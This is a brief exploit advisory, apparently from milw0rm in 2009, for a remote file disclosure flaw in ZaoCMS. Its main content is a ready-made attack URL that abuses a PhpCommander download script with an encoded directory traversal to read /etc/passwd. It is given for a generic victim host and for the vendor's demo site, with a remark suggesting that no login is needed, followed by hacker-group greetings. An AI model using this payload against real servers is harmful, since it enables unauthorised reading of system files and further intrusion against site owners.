-------------------------------------------------------------- ZaoCMS Remote File Disclosure Vulnerability --------------------------------------------------------------- Founder :ThE g0bL!N Home:http://www.zaocms.com/ Software : ZaoCMS Note: The OperatIon Worked By Deleting Your Cookies From The Vuln 1 --------------------------------------------------------------- Exploit: --------- http://wwww.victim.co.il/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F demo: ------- http://demo.zaocms.com/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F ----------------------------------------------------------------------------------------------------- His0k4 - Dr-HTmL , Dos-Dz TeaM , Kondamne , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r. ----------------------------------------------------------------------------------------------------- # milw0rm.com [2009-05-21]